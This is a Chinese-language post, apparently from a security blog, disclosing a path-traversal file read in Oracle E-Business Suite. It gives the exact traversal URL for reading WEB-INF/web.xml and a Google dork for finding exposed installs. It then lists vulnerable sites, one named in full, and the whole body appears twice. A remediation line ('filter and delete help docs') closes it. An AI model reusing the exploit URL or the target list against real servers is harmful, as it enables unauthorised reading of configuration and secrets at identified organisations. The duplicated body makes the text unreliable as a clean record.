Oracle EBusiness某版本文件遍历读取漏洞

      Oracle EBusiness某版本文件遍历读取漏洞无评论

  Oracle E-Business某版本存在文件遍历读取漏洞

  在某次扫描中发现一处文件遍历读取:

  http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

Oracle EBusiness某版本文件遍历读取漏洞

  发现是oracle某个系统

Oracle EBusiness某版本文件遍历读取漏洞

  利用特征URL google hacking,发现国外有大量网站使用该系统

  inurl:’OA_HTML/AppsLocalLogin.jsp’

Oracle EBusiness某版本文件遍历读取漏洞

  虽然有部分网站做了过滤,返回HTTP 410,但很大概率能读到web.xml配置文件

Oracle EBusiness某版本文件遍历读取漏洞

  列举一些存在漏洞的地址:

  http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://myerp.public.apsva.us/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  http://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**.kw/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  在某次扫描中发现一处文件遍历读取:

  http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

Oracle EBusiness某版本文件遍历读取漏洞

  发现是oracle某个系统

Oracle EBusiness某版本文件遍历读取漏洞

  利用特征URL google hacking,发现国外有大量网站使用该系统

  inurl:’OA_HTML/AppsLocalLogin.jsp’

Oracle EBusiness某版本文件遍历读取漏洞

  虽然有部分网站做了过滤,返回HTTP 410,但很大概率能读到web.xml配置文件

Oracle EBusiness某版本文件遍历读取漏洞

  列举一些存在漏洞的地址:

  http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://myerp.public.apsva.us/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  http://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  https://**.**.**.**.kw/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

  解决方案

  过滤+删除帮助文档

发表评论